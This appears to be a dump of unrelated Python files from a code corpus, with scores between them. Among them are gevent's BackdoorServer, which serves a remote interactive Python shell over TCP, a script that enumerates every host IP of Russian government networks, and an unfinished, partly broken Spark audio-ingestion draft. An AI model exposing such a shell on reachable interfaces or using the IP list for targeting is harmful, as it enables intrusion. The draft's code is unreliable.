        self.assertEqual(PS.add_ratio(self._test_frame, ['i1'], csum=True).columns.__len__(), 4)

    def test_add_csum(self):
        self.assertEqual(PS.add_csum(self._test_frame, 'i1').columns.__len__(), 3)
2.640625
3
08-About_scrapy/douban/main.py
jiaxiaochu/spider
0
11823
<reponame>jiaxiaochu/spider
#!/Library/Frameworks/Python.framework/Versions/3.7/bin/python3
# -*- coding:utf-8 -*-
# @Author : Jiazhixiang

# Import the cmdline module, which lets us drive scrapy from the command line.
from scrapy import cmdline

# Use execute() to run the scrapy crawl command for the 'douban' spider.
cmdline.execute(['scrapy', 'crawl', 'douban'])
1.421875
1
DynamicProgramming/longestIncreasingSubsequence.py
suyash248/data_structures
7
11824
<reponame>suyash248/data_structures
from Array import empty_1d_array

"""
input array  : [10, 22, 9, 33, 21, 50, 41, 60]
# Element at index `i` is the length of the longest increasing subsequence that ends at index `i`.
output array : [1, 2, 1, 3, 2, 4, 4, 5]
"""

# Time complexity: O(n^2)
# Space complexity: O(n)
def lis_dp(arr):
    # Length of LIS at each index is at least 1 (the element itself).
    n = len(arr)
    lis_arr = empty_1d_array(n, 1)

    for i in range(1, n):          # for i=1; i<n; i++
        for j in range(0, i):      # for j=0; j<i; j++
            if arr[i] > arr[j]:    # and lis_arr[i] < lis_arr[j]+1:
                prev_lis_till_i = lis_arr[i]
                curr_lis_till_i = lis_arr[j] + 1
                if curr_lis_till_i > prev_lis_till_i:
                    # Update lis_till_i
                    lis_arr[i] = curr_lis_till_i
    # print(lis_arr)
    return max(lis_arr)

if __name__ == '__main__':
    arr = [10, 22, 9, 33, 21, 50, 41, 60]
    max_lis = lis_dp(arr)
    print("Length of longest increasing sub-sequence for given array is {}".format(max_lis))
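
# --- Added illustration (not part of the original solution) ---
# The same LIS length can be computed in O(n log n) with the patience-sorting /
# binary-search technique: tails[k] holds the smallest possible tail of an
# increasing subsequence of length k+1. Sketch for comparison only.
import bisect

def lis_length_nlogn(arr):
    tails = []
    for x in arr:
        pos = bisect.bisect_left(tails, x)
        if pos == len(tails):
            tails.append(x)        # x extends the longest subsequence found so far
        else:
            tails[pos] = x         # x becomes a smaller tail for subsequences of length pos+1
    return len(tails)

# e.g. lis_length_nlogn([10, 22, 9, 33, 21, 50, 41, 60]) == 5, matching lis_dp above.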
3.71875
4
venv/Lib/site-packages/gevent/backdoor.py
Kiiwi/Syssel
0
11825
<reponame>Kiiwi/Syssel # Copyright (c) 2009-2014, gevent contributors # Based on eventlet.backdoor Copyright (c) 2005-2006, <NAME> from __future__ import print_function import sys from code import InteractiveConsole from gevent import socket from gevent.greenlet import Greenlet from gevent.hub import PY3, PYPY, getcurrent from gevent.server import StreamServer if PYPY: import gc __all__ = ['BackdoorServer'] try: sys.ps1 except AttributeError: sys.ps1 = '>>> ' try: sys.ps2 except AttributeError: sys.ps2 = '... ' class _Greenlet_stdreplace(Greenlet): _fileobj = None def switch(self, *args, **kw): if self._fileobj is not None: self.switch_in() Greenlet.switch(self, *args, **kw) def switch_in(self): self.saved = sys.stdin, sys.stderr, sys.stdout sys.stdin = sys.stdout = sys.stderr = self._fileobj def switch_out(self): sys.stdin, sys.stderr, sys.stdout = self.saved self.saved = None def run(self): try: return Greenlet.run(self) finally: # XXX why is this necessary? self.switch_out() class BackdoorServer(StreamServer): """Provide a backdoor to a program for debugging purposes. You may bind to any interface, but for security purposes it is recommended that you bind to 127.0.0.1. Basic usage: >> from gevent.backdoor import BackdoorServer >> server = BackdoorServer(('127.0.0.1', 5001), ... locals={'foo': "From defined scope!"}) >> server.serve_forever() In a another terminal, connect with... $ telnet 127.0.0.1 5001 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. Python 2.7.5 (default, May 12 2013, 12:00:47) [GCC 4.8.0 20130502 (prerelease)] on linux2 Type "help", "copyright", "credits" or "license" for more information. (InteractiveConsole) >> print foo From defined scope! """ def __init__(self, listener, locals=None, banner=None, **server_args): StreamServer.__init__(self, listener, spawn=_Greenlet_stdreplace.spawn, **server_args) self.locals = locals self.banner = banner self.stderr = sys.stderr def handle(self, conn, address): f = getcurrent()._fileobj = _fileobject(conn) f.stderr = self.stderr getcurrent().switch_in() try: console = InteractiveConsole(self.locals) # __builtins__ may either be the __builtin__ module or # __builtin__.__dict__ in the latter case typing # locals() at the backdoor prompt spews out lots of # useless stuff try: import __builtin__ console.locals["__builtins__"] = __builtin__ except ImportError: import builtins console.locals["builtins"] = builtins console.locals['__builtins__'] = builtins console.interact(banner=self.banner) except SystemExit: # raised by quit() if not PY3: sys.exc_clear() finally: conn.close() f.close() if PYPY: # The underlying socket somewhere has a reference # that's not getting closed until finalizers run. # Without running them, test__backdoor.Test.test_sys_exit # hangs forever gc.collect() class _fileobject(socket._fileobject): if not PY3: def write(self, data): self._sock.sendall(data) else: def write(self, data): if isinstance(data, str): data = data.encode('utf-8') self._sock.sendall(data) def isatty(self): return True def flush(self): pass def _readline(self, *a): return socket._fileobject.readline(self, *a).replace(b"\r\n", b"\n") if not PY3: readline = _readline else: def readline(self, *a): line = self._readline(*a) return line.decode('utf-8') if __name__ == '__main__': if not sys.argv[1:]: print('USAGE: %s PORT' % sys.argv[0]) else: BackdoorServer(('127.0.0.1', int(sys.argv[1])), locals={'hello': 'world'}).serve_forever()
2.3125
2
spark/par_decompress_audio.py
droyston/spectralize
0
11826
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Wed Jun 17 16:12:56 2020 @author: dylanroyston """ # import/configure packages import numpy as np import pandas as pd #import pyarrow as pa import librosa import librosa.display from pathlib import Path #import Ipython.display as ipd #import matplotlib.pyplot as plt from pyspark.sql import * import pyspark.sql.functions as f from pyspark import SparkConf, SparkContext, SQLContext import boto3 from tinytag import TinyTag as tt import soundfile as sf import audioread from pydub import AudioSegment from io import BytesIO #from io import BytesIO import os import sys import time import struct sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)) + "/lib") #import config time_seq = [] ##### # create local Spark instance (for non-cluster dev) sc = SparkContext('local') spark = SparkSession (sc) spark.conf.set("spark.sql.execution.arrow.enabled", "true") # define Spark config def spark_conf(): conf = SparkConf().setAppName("decompress_audio_files") sc = SparkContext(conf=conf) spark = SparkSession.builder.getOrCreate() return spark spark = spark_conf() spark.conf.set("spark.sql.execution.arrow.enabled", "true") ##### # Function to write spark-dataframe to mySQL def write_df_to_psql(df, tablename): psql_user = os.environ.get('PSQL_USR') psql_pwd = os.environ.get('PSQL_PWD') df.write.format('jdbc').options( url='jdbc:postgresql://10.0.0.6:5432/spectralize', dbtable=tablename, user=psql_user, #password=<PASSWORD>).mode('append').save() password=psql_pwd).save() ##### # function to read audio files from S3 bucket and extract tags def read_audio_files(): # basic initialization time_seq.append(['start-read-audio', time.time()]) # DataFrame schema File_Tags = Row("s3_key", "song_id", "album", "albumartist", "artist", "audio_offset", "bitrate", "channels", "comment", "composer", "disc", "disc_total", "duration", "filesize", "genre", "samplerate", "title", "track", "track_total", "year") spec_labels = [] for sn in range(0,128): spec_labels.append('spec' + str(sn+1)) spec_df_labels = ['song_id','timeseries'] + spec_labels Spec_Tags = Row(spec_df_labels) # configure S3 access s3_bucket = 'mdp-spectralize-pal' number_of_files = 0 s3 = boto3.resource('s3') boto_client = boto3.client('s3') bucket = s3.Bucket(s3_bucket) number_of_files=0 file_limit=100 #local_path = './local_file.' 
known_ext = [".mp3", ".wav", ".m4a"] #read each file from S3 bucket for obj in bucket.objects.all(): s3_key = obj.key audio_obj_stream = boto_client.get_object(Bucket=s3_bucket, Key=s3_key) audio_obj = BytesIO(audio_obj_stream['Body'].read()) song = bytes(audio_obj) song = sf.SoundFile(audio_obj) song = open(audio_obj, 'rb').read() song = audioread.audio_open(audio_obj) # extract tags from mp3 files #if "mp3" in s3_key: #if any(ext in s3_key for ext in known_ext): #print(number_of_files) #ext = s3_key[-4:] #local_path = './localfile' + ext number_of_files+=1 #bucket.download_file(s3_key, local_path) local_path = '/home/dylanroyston/Music/spectralize_data/01 Konoha Densetsu.mp3' song = open(local_path, 'rb').read() ##### tags tags = tt.get(local_path) tags = tt.get(audio_obj) # extract tags from tinytag object indiv_tags = (s3_key, number_of_files, tags.album, tags.albumartist, tags.artist, tags.audio_offset, tags.bitrate, tags.channels, tags.comment, tags.composer, tags.disc, tags.disc_total, tags.duration, tags.filesize, tags.genre, tags.samplerate, tags.title, tags.track, tags.track_total, tags.year) # convert tuple object to list indiv_tag_list = list(indiv_tags) indiv_tag_list = [str(i) for i in indiv_tag_list] tag_seq=[] tag_seq.append(indiv_tag_list) tags_pdf = pd.DataFrame(data=tag_seq) tag_df = spark.createDataFrame(tags_pdf, schema=File_Tags) ##### audio # load audio file with Librosa #y, sr = librosa.load(str(Path(local_path)), sr=None) y, sr = librosa.load(local_path, sr=None) # create indexing variables (song_id, timestamp) # song_id defined as "repeat(number_of_files)" song_num = pd.Series([number_of_files]) num_points = len(y) song_id = song_num.repeat(num_points) song_id = song_id.to_numpy() # timeseries defined as "1 : length(audio_data)" timeseries = np.arange(num_points) timeseries = timeseries.transpose() full_audio = {'song_id': song_id, 'timeseries': timeseries, 'intensity': y} # create combined dataframe audio_pdf = pd.DataFrame(data = full_audio) audio_df = spark.createDataFrame(audio_pdf) ##### spectral S = librosa.feature.melspectrogram(y, sr=sr, n_mels=128, fmax=10000) log_S = librosa.power_to_db(S, ref=np.max) log_S = log_S.transpose() # song_id defined as "repeat(number_of_files)" song_num = pd.Series([number_of_files]) num_points = len(S.transpose()) song_id = song_num.repeat(num_points) song_id = song_id.to_numpy() # timeseries defined as "1 : length(audio_data)" timeseries = np.arange(num_points) timeseries = timeseries.transpose() full_index = {'song_id': song_id, 'timeseries': timeseries} index_pdf = pd.DataFrame(full_index) spec_pdf = pd.DataFrame(data=log_S, columns=spec_labels) full_spec = pd.concat([index_pdf, spec_pdf], axis=1) spec_df = spark.createDataFrame(full_spec) ##### write dataframes to psql write_df_to_psql(tag_df, 'clean_metadata') write_df_to_psql(audio_df, 'clean_audio') write_df_to_psql(spec_df, 'clean_spec') # stop process when file_limit is crossed (small batches) if (number_of_files >= file_limit): break ##### time_seq.append(['end read-file', time.time()]) #df_tags = spark.createDataFrame(tag_seq, schema=File_Tags) #df_audio = spark.createDataFrame(audio_seq) #df_spec = spark.createDataFrame(audio_seq, schema=Spec_Tags) # Additional run to #df_audio_data = spark.createDataFrame(file_audio_data) #process_df(df_audio_data) ##### if __name__ == '__main__': time_seq.append(['start', time.time()]) read_audio_files()
2.09375
2
get_ip_list_ru_gov.py
gil9red/SimplePyScripts
117
11827
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

__author__ = 'ipetrash'

"""Prints the list of IP addresses belonging to (Russian) government organizations."""

import ipaddress
import sys

import requests

rs = requests.get('https://jarib.github.io/anon-history/RuGovEdits/ru/latest/ranges.json')

# Check that the request succeeded and returned the expected data
if not rs or not rs.json() or 'ranges' not in rs.json():
    print('Could not fetch the list of government organization IPs')
    sys.exit()

# Fetch the entries and sort them by organization name
items = sorted(rs.json()['ranges'].items(), key=lambda x: x[0])

ip_counter = 0

for i, (name, ip_network_list) in enumerate(items, 1):
    print(f'{i}. {name}')

    # Each entry is an IP range with a subnet mask
    for ip_network in ip_network_list:
        print(f'    {ip_network}:')

        # Build the network object
        net4 = ipaddress.ip_network(ip_network)

        # Iterate over the host addresses of the organization
        for ip in net4.hosts():
            print(f'        {ip}')
            ip_counter += 1

    print()

print('Total IPs:', ip_counter)
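
# --- Added note (not part of the original script) ---
# If only the total number of addresses per network is needed, ipaddress can
# report it without enumerating every host, e.g.:
#
#     total = sum(ipaddress.ip_network(net).num_addresses
#                 for _, nets in items for net in nets)
#
# Keep in mind that num_addresses also counts the network and broadcast
# addresses, so it is slightly larger than the count produced by .hosts() above.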
2.796875
3
test_collection.py
Rodrun/weatherguess
0
11828
<gh_stars>0
import unittest

import requests

from collection import Collection


class TestCollection(unittest.TestCase):

    def setUp(self):
        # Get the sample JSON data
        self.data = requests.get("http://samples.openweathermap.org/data/2.5/weather?zip=94040,us&appid=b6907d289e10d714a6e88b30761fae22").json()
        self.coll = Collection(getlist=["weather.main", "main.temp", "clouds.all", "doesntExist"])
        self.dcoll = Collection()

    def test_detect_none(self):
        """
        Test if get_weather returns a list of the default value when given None.
        """
        self.assertCountEqual([x for x in self.coll.get_weather(None)],
                              [0. for i in range(0, len(self.coll.get_getlist()))])

    def test_get_weather(self):
        """
        Test if get_weather functions correctly.
        """
        data = [x for x in self.coll.get_weather(self.data)]
        self.assertIsInstance(data[0], str)
        self.assertIsInstance(data[1], float)
        self.assertIsInstance(data[2], int)
        self.assertEqual(data[3], 0.)

    def test_get_weather_defaults(self):
        """
        Test if get_weather functions correctly using the default getlist.
        """
        data = [x for x in self.dcoll.get_weather(self.data)]
        self.assertIsNotNone(data)
        print(data)
3.46875
3
tests/bitwiseOperations/__init__.py
mgorzkowski/abn
4
11829
from . import nand_tests
from . import and_tests
from . import nor_tests
from . import not_tests
from . import or_tests
from . import xor_tests
from . import rotate_left_tests
from . import rotate_right_tests
from . import shift_left_tests
from . import shift_right_tests
1.085938
1
exot/util/misc.py
ETHZ-TEC/exot_eengine
0
11830
# Copyright (c) 2015-2020, Swiss Federal Institute of Technology (ETH Zurich) # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # * Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # """Misc helpers""" import math import random import re import signal import typing as t from datetime import datetime from enum import Enum from functools import reduce from inspect import isabstract from string import ascii_letters from subprocess import list2cmdline as _list2cmdline from typing import Mapping as Map import numpy as np from exot.exceptions import * __all__ = ( "call_with_leaves", "dict_depth", "dict_diff", "find_attributes", "flatten_dict", "get_concrete_subclasses", "get_subclasses", "get_valid_access_paths", "getitem", "has_method", "has_property", "has_type", "has_variable", "is_abstract", "is_scalar_numeric", "leaves", "list2cmdline", "map_to_leaves", "mro_getattr", "mro_hasattr", "random_string", "safe_eval", "sanitise_ansi", "setgetattr", "setitem", "stub_recursively", "unpack__all__", "validate_helper", "get_cores_and_schedules", ) """ Signatures ---------- call_with_leaves :: (function: Callable[[Any], Any], obj: ~T, _seq: bool = True) -> None dict_depth :: (obj: Any, level: int = 0) -> int dict_diff :: (left: Mapping, right: Mapping) -> List[Dict] find_attributes :: (attr: str, klass: Any) -> List flatten_dict :: (obj: Mapping, sep: str = '.') -> Mapping get_concrete_subclasses :: (klass, recursive=True, derived=True) -> List get_subclasses :: (klass, recursive=True, derived=True) -> List get_valid_access_paths :: (obj: Mapping, _limit: int = 8192, _leaf_only: bool = False, _use_lists: bool = True, _fallthrough_empty: bool = True) -> Generator getitem :: (obj: Mapping, query: Union[str, Tuple], *args: Any, sep: str = '/') -> Any has_method :: (klass: Union[type, object], name: str) -> bool has_property :: (klass: Union[type, object], name: str) -> bool has_type :: (klass: Union[type, object]) -> bool has_variable :: (klass: Union[type, object], name: str) -> bool is_abstract :: (klass: Union[type, object]) -> bool is_scalar_numeric :: (value: t.Any) -> bool map_to_leaves :: (function: Callable[[Any], Any], obj: ~T, 
_seq: bool = True) -> Any mro_getattr :: (cls: type, attr: str, *args: Any) -> Any mro_hasattr :: (cls: type, attr: str) -> bool random_string :: (length: int) -> str safe_eval :: (to_eval: str, expect: Tuple[type], timeout: int) -> object sanitise_ansi :: (value Union[List[str], str]) -> Union[List[str], str] setgetattr :: (klass: Union[type, object], attr: str, default: Any) -> None setitem :: (obj: MutableMapping, query: Tuple, value: Any) -> None stub_recursively :: (obj: ~T, stub: Any = None, _stub_list_elements: bool = True) -> Optional[~T] unpack__all__ :: (*imports: Collection[str]) -> Tuple[str] validate_helper :: (what: Mapping, key: Any, *types: type, msg: str = '') -> NoReturn """ def call_with_leaves(function: t.Callable[[t.Any], t.Any], obj: t.T, _seq: bool = True) -> None: """Calls a function on leaves of an object A leaf is considered to be an object that is not a Mapping (or, when _seq is set, also not a Sequence except a string, which is also a Sequence). Args: function (t.Callable[[t.Any], t.Any]): The callable obj (t.T): The tree-like or sequence-like object _seq (bool, optional): Should sequences be considered?. Defaults to True. """ def inner(obj: t.T) -> t.Any: if isinstance(obj, Map): for v in obj.values(): inner(v) elif _seq and isinstance(obj, (t.List, t.Set)): for v in obj: inner(v) else: return function(obj) inner(obj) def dict_depth(obj: t.Any, level: int = 0) -> int: """Get maximum depth of a dict-like object Args: obj (t.Any): The dict-like object level (int): For internal use only. Defaults to 0. .. note:: The depth of a non-dict-like object is considered to be 0. An empty dict increases the depth if `_empty_increments` is True. Examples: >>> dict_depth(1) # returns 0 >>> dict_depth([1,2,3]) # returns 0 >>> dict_depth({1: 1, 2: 2}) # returns 1 >>> dict_depth({1: {2: {3: 3}}}) # returns 3 >>> dict_depth({1: {2: {3: {}}}}) # returns 4 """ if not isinstance(obj, Map) or not obj: return level return max(dict_depth(v, level + 1) for k, v in obj.items()) def dict_diff(left: Map, right: Map) -> t.List[t.Dict]: """Get the difference between 2 dict-like objects Args: left (Map): The left dict-like object right (Map): The right dict-like object The value returned is a list of dictionaries with keys ["path", "left", "right"] which contain the query path and the differences between the left and right mapping. If a key is missing in either mapping, it will be indicated as a "None". `math.nan` (not-a-number) is used for default values in the comparison because of the property: `math.nan != math.nan`. Simple None cannot be used, since it would not handle keys that both have a value of None. In general, this function might report false-positives for keys that contain the math.nan (or np.nan) value simply due to this property. There is no workaround available. 
""" left_paths = set(get_valid_access_paths(left, _leaf_only=True, _use_lists=False)) right_paths = set(get_valid_access_paths(right, _leaf_only=True, _use_lists=False)) return list( { "path": path, "left": getitem(left, path, math.nan), "right": getitem(right, path, math.nan), } for path in left_paths.union(right_paths) if getitem(left, path, math.nan) != getitem(right, path, math.nan) ) def find_attributes(klass: t.Any, attr: str) -> t.List: """Find attributes in any of a class'es bases Args: klass (t.Any): The type object attr (str): The attribute Returns: t.List: List of found instances of the attribute in the class hierarchy """ if not isinstance(attr, str): raise TypeError(attr) mro = klass.__mro__ if hasattr(klass, "__mro__") else type(klass).mro() return [attr for base in mro if hasattr(base, attr)] def flatten_dict(obj: Map, sep: str = ".") -> Map: """Flatten a dict to a 1-level dict combining keys with a separator Args: obj (Map): The dict-like object sep (str): The separator used when combining keys. Defaults to ".". Returns: Map: A flattened object of same type as 'obj'. .. warning:: Flattening will enforce all keys to be string-types! `reducer` is a function accepted by the functools.reduce function, which is of form: f(a, b) where _a_ is the accumulated value, and _b_ is the updated value from the iterable. The .items() function produces key-value tuple-pairs. These can be expanded with *, e.g. `*("a", "b")` will expand to `"a", "b"`. This property is used to expand the `kv_pair` below. Example walkthrough on `flatten_dict({'a': 1, 'b': {'c': {'d': 2}}})`: :: `outer` <- obj: {'a': 1, 'b': {'c': {'d': 2}}}, prefix: '' `reducer` <- key: 'a', value: 1 `inner` <- acc: {}, key: 'a', value: 1, prefix: '' `inner` -> {'a': 1} `reducer` -> {'a': 1} `reducer` <- key: 'b', value: {'c': {'d': 2}} `inner` <- acc: {'a': 1}, key: 'b', value: {'c': {'d': 2}}, prefix: '' `outer` <- obj: {'c': {'d': 2}}, prefix: 'b.' `reducer` <- key: 'c', value: {'d': 2} `inner` <- acc: {}, key: 'c', value: {'d': 2}, prefix: 'b.' `outer` <- obj: {'d': 2}, prefix: 'b.c.' `reducer` <- key: 'd', value: 2 `inner` <- acc: {}, key: 'd', value: 2, prefix: 'b.c.' `inner` -> {'b.c.d': 2} `reducer` -> {'b.c.d': 2} `outer` -> {'b.c.d': 2} `inner` -> {'b.c.d': 2} `reducer` -> {'b.c.d': 2} `outer` -> {'b.c.d': 2} `inner` -> {'a': 1, 'b.c.d': 2} `reducer` -> {'a': 1, 'b.c.d': 2} `outer` -> {'a': 1, 'b.c.d': 2} """ if not isinstance(obj, Map): raise TypeError("flatten_dict works only on dict-like types", type(obj)) _t = type(obj) def outer(obj: Map, prefix: str) -> Map: def reducer(accumulator: Map, kv_pair: t.Tuple): return inner(accumulator, *kv_pair, prefix) return reduce(reducer, obj.items(), _t()) def inner(accumulator: Map, key: str, value: t.Any, prefix: str) -> Map: if isinstance(value, Map): return _t(**accumulator, **outer(value, prefix + key + sep)) else: return _t(**accumulator, **_t({prefix + key: value})) return outer(obj, "") def expand_dict(obj: Map, sep: str = ".") -> Map: """Expands a flattened mapping by splitting keys with the given separator Args: obj (Map): The flattened dict-like object to unflatten sep (str, optional): The key separator Raises: TypeError: If wrong type is supplied ValueError: If a non-flat dict is supplied Returns: Map: The expanded mapping object of same type as 'obj'. 
Example: >>> d = {'a': 1, 'b': 2, 'c.ca': 1, 'c.cb': 2} >>> expand_dict(d) {'a': 1, 'b': 2, 'c': {'ca': 1, 'cb': 2}} """ if not isinstance(obj, Map): raise TypeError("expand_dict works only on dict-like types", type(obj)) if dict_depth(obj) != 1: raise ValueError( "expand_dict works only on flat dict-like types, " "got a mapping of depth: {}".format(dict_depth(obj)) ) def inner(obj): accumulator = type(obj)() for k, v in obj.items(): *head, last = k.split(sep) _ = accumulator # Create missing paths for part in head: if part not in _: _[part] = type(obj)() _ = _[part] _[last] = v return accumulator return inner(obj) def get_concrete_subclasses(klass, recursive: bool = True, derived: bool = True) -> t.List: """Get a list of non-abstract subclasses of a type Args: klass (t.Type): The type object recursive (bool): Should the classes be extracted recursively? Defaults to True. derived (bool): Use the 'derived' property of SubclassTracker-enhanced types? [True] Returns: t.List: A list of concrete subclasses of the type """ from exot.util.mixins import _SubclassTracker as __ if derived and hasattr(klass, __.concrete): return list(getattr(klass, __.concrete)) subclasses = get_subclasses(klass, recursive=recursive) return [k for k in subclasses if not isabstract(k)] def get_subclasses(klass, recursive: bool = True, derived: bool = True) -> t.List: """Get a list of subclasses of a type Args: klass (t.Type): The type object recursive (bool): Should the classes be extracted recursively? Defaults to True. derived (bool): Use the 'derived' property of SubclassTracker-enhanced types? [True] Returns: t.List: A list of concrete subclasses of the type """ from exot.util.mixins import _SubclassTracker as __ if not (hasattr(klass, "__subclasses__") or hasattr(klass, __.derived)): raise TypeError(f"__subclasses__ or {__.derived} attribute missing", klass) if derived: return list(getattr(klass, __.derived)) subclasses = klass.__subclasses__() def walker(k): first, *rest = k if len(rest): walker(rest) if first not in subclasses: subclasses.append(first) if hasattr(first, "__subclasses__"): _ = first.__subclasses__() if len(_): walker(_) if recursive: walker(subclasses) return subclasses def get_valid_access_paths( obj: Map, _limit: int = 8192, _leaf_only: bool = False, _use_lists: bool = True, _fallthrough_empty: bool = True, ) -> t.Generator[t.Tuple, None, None]: """Generate valid key sequences in a dict, optionally including lists Args: obj (Map): The dict-like object _limit (int): Maximum number of paths that can be created with list-like elements. _leaf_only (bool): Provide paths for only the leaves of the mapping. Defaults to True. _use_lists (bool): Provide paths for list-like elements in the mapping. Defaults to True. _fallthrough_empty (bool): Discard empty list- or dict-like elements? Defaults to True. Details: If `_leaf_only` is set, only paths to leaves will be produced, a leaf being a value that is not a mapping (or list). If `_use_lists` is set, lists will also be *recursively* checked for valid paths. if `_fallthrough_empty` is set, an empty dict or list will yield an empty tuple, rendering a parent path. Returns: t.Generator[t.Tuple,None,None]: A generator that yields the access paths (tuples). 
Examples: >>> # Only leaves: >>> d = {'a1': {'a2': None}, 'b2': None} >>> list(get_valid_access_paths(d, _leaf_only=True)) [('a1', 'a2'), ('b2',)] >>> # All paths: >>> list(get_valid_access_paths(d, _leaf_only=False)) [('a1',), ('a1', 'a2'), ('b2',)] """ def thrower(o: object, t: type, n: str) -> t.NoReturn: if not isinstance(o, t): raise TypeError( f"get_valid_access_paths expected {t!r} for {n!r}, got: {type(o)!r}" ) thrower(obj, Map, "obj") thrower(_limit, int, "_limit") thrower(_leaf_only, bool, "_leaf_only") thrower(_use_lists, bool, "_use_lists") thrower(_fallthrough_empty, bool, "_fallthrough_empty") def inner(obj: t.Union[Map, t.List, t.Set]) -> t.Generator: if _fallthrough_empty and not obj: yield tuple() # if obj is a mapping if isinstance(obj, Map): for k, v in obj.items(): # if the value in obj is also a mapping... if isinstance(v, Map): if not _leaf_only: yield (k,) # ... make a recursive call for vv in inner(v): yield (k,) + vv # if the value in obj is a list... elif _use_lists and isinstance(v, (t.List, t.Set)): # ... first yield the valid path to the key containing the list if v and not _leaf_only: yield (k,) elif not v and _fallthrough_empty: yield (k,) # ... loop through elements, and keep track of indexes for idx, vv in enumerate(v): # if an element is also a mapping or list... if isinstance(vv, (Map, (t.List, t.Set))): # ... make a recursive call for vvv in inner(vv): yield (k,) + (idx,) + vvv else: # ... otherwise yield keypath + idx yield (k,) + (idx,) # if the value is neither a mapping nor a list, yield the key else: yield (k,) # if obj is a list-like sequence if _use_lists and isinstance(obj, (t.List, t.Set)): # might be tricky to generate valid sequences for large lists! if _limit and len(obj) >= _limit: raise ValueError( f"get_key_sequences list limit of {_limit} exceeded: {len(obj)}" ) for idx, v in enumerate(obj): if isinstance(v, (Map, (t.List, t.Set))): for vv in inner(v): yield (idx,) + vv else: yield (idx,) return inner(obj) def getitem(obj: Map, query: t.Union[str, t.Tuple], *args: t.Any, sep: str = "/") -> t.Any: """Get a value from a dict-like object using an XPath-like query, or a tuple-path Accesses an object that provides a dict-like interface using a query: either a tuple representing the path, or a string where consecutive keys are separated with a separator, e.g. "key1/key2". Returns the value of the object at the given key-sequence. Returns a default value if provided, or throws a LookupError. Args: obj (Map): a mapping query (t.Union[str, t.Tuple]): a query path using a separated string or a tuple *args (t.Any): an optional default value, similar to `getattr` sep (str, optional): a separator string used to split a string query path Returns: t.Any: the value stored in obj for the given query, or the default value Raises: LookupError: if query not found and no default value is provided TypeError: if obj is not a mapping, or query is not a str or tuple """ if not isinstance(obj, Map): raise TypeError("'obj' must be an instance of Mapping, e.g. 
dict", type(obj)) if not isinstance(query, (str, t.Tuple)): raise TypeError("'query' must be a str or a tuple", type(query)) if len(args) > 1: raise TypeError(f"getitem accepts at most 3 positional args, got {len(args)}") _obj = obj # handler for tuple queries if isinstance(query, t.Tuple): _valid = get_valid_access_paths(obj) if query not in _valid: if args: return args[0] else: raise LookupError(f"query {query!r} not found") else: for node in query: _obj = _obj[node] return _obj # handler for string queries else: try: # loop through components in the query, consecutively accessing the mapping for node in query.split(sep): # handle empty nodes in the query, e.g. when query="a///b" -> "a/b" if not node: continue if isinstance(_obj, Map): for k in _obj.keys(): node = type(k)(node) if str(k) == node else node elif isinstance(_obj, (t.List, t.Set)): try: node = int(node) except TypeError: raise LookupError( f"{node} not convertible to int when attempting to access " f"a list {_obj!r}" ) _obj = _obj[node] return _obj except LookupError as Error: if args: return args[0] else: Error.args += (query,) raise def has_method(klass: t.Union[type, object], name: str) -> bool: """Check if a method exists in any of a klass'es bases Args: klass (t.Union[type, object]): The type or object name (str): The name of the method Returns: bool: True if has a method with the given name. """ candidates = find_attributes(klass, name) if not candidates: return False def is_callable(c): return isinstance(getattr(klass, str(c), None), t.Callable) return all(is_callable(f) for f in candidates) def has_property(klass: t.Union[type, object], name: str) -> bool: """Check if a variable exists in any of a klass'es bases Args: klass (t.Union[type, object]): The type or object name (str): The name of the property Returns: bool: True if has a property with the given name. """ candidates = find_attributes(klass, name) if not candidates: return False def is_property(c): return not isinstance(getattr(klass, str(c), None), property) return all(is_property(f) for f in candidates) def has_type(klass: t.Union[type, object]) -> bool: """Check if a type or instance has a Type member type that derives from Enum Args: klass (t.Union[type, object]): The type or object Returns: bool: True if has the "Type" attribute. """ if not isinstance(klass, (type, object)): raise TypeError(klass) return issubclass(getattr(klass, "Type", type(None)), Enum) def has_variable(klass: t.Union[type, object], name: str) -> bool: """Check if a variable exists in any of a klass'es bases Args: klass (t.Union[type, object]): The type or object name (str): The name of the variable Returns: bool: True if has a variable with the given name. """ candidates = find_attributes(klass, name) if not candidates: return False def is_not_callable(c): return not isinstance(getattr(klass, str(c), None), t.Callable) return all(is_not_callable(f) for f in candidates) def is_abstract(klass: t.Union[type, object]) -> bool: """Check if a type or instance is abstract Args: klass (t.Union[type, object]): The type or object Returns: bool: True if the type/instance is abstract. """ if not isinstance(klass, (type, object)): raise TypeError(klass) if hasattr(klass, "__abstractmethods__"): return 0 != len(getattr(klass, "__abstractmethods__")) else: from inspect import isabstract return isabstract(klass) def is_scalar_numeric(value: t.Any) -> bool: """Check if is an int, a float, or a NumPy variant thereof Args: value (t.Any): The value to inspect Returns: bool: True if scalar and numeric. 
